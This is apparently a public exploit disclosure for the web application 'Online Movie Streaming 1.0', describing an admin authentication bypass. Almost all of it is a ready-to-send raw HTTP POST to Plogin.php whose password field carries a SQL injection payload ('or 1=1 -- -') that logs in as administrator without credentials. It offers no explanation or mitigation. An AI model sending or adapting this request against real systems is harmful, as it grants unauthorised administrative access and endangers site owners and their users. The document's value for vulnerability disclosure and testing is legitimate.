Online Movie Streaming 1.0 SQL Injection

Online Movie Streaming 1.0 - Admin Authentication Bypass

Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

Exploit URL: http://TARGET/onlinemovies/Plogin.php

1
2
3
4
5
6
7
8
9
10
POST /onlinemovies/Plogin.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://TARGET
Connection: close
Cookie: PHPSESSID=p09pmo49cb8dr0s75r1jhttlvj
Upgrade-Insecure-Requests: 1

mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login=